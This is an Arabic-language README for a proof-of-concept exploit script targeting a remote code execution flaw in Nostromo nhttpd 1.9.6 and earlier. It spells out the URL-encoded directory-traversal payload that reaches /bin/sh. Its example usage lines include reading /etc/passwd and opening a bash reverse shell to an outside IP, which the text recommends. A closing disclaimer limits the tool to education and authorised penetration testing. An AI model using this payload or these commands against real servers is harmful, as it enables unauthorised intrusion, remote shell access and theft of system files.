
استغلال PoC لثغرة تنفيذ الأوامر عن بُعد (RCE) في Nostromo nhttpd ≤ 1.9.6
ثغرة تنفيذ برمجيات عن بُعد (Remote Code Execution) في إصدارات Nostromo nhttpd الأقدم من أو المساوية للإصدار 1.9.6 عبر اجتياز المسار (directory traversal) في معالجة طلبات HTTP.
يستغل هذا الاستغلال ثغرة اجتياز المسار باستخدام أحرف CRLF المرمزة عبر URL (%0d) للوصول إلى /bin/sh وتنفيذ أوامر عشوائية.
/.%0d./.%0d./.%0d./.%0d./bin/shecho\necho\n<command> 2>&1python3 cve-2019-16278.py <TARGET_IP> <PORT> <COMMAND>
python3 cve-2019-16278.py 192.168.1.100 80 "id"
python3 cve-2019-16278.py 10.10.10.10 8080 "cat /etc/passwd"
python3 cve-2019-16278.py target.com 80 "whoami"
python3 cve-2019-16278.py 10.10.10.10 80 "bash -c 'bash -i >& /dev/tcp/10.10.20.20/4444 0>&1'"
يوصى باستخدام القشرة العكسية (Reverse shell)، ففي بعض الأحيان لا يُظهر هذا السكربت شيئًا.
هذه الأداة مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.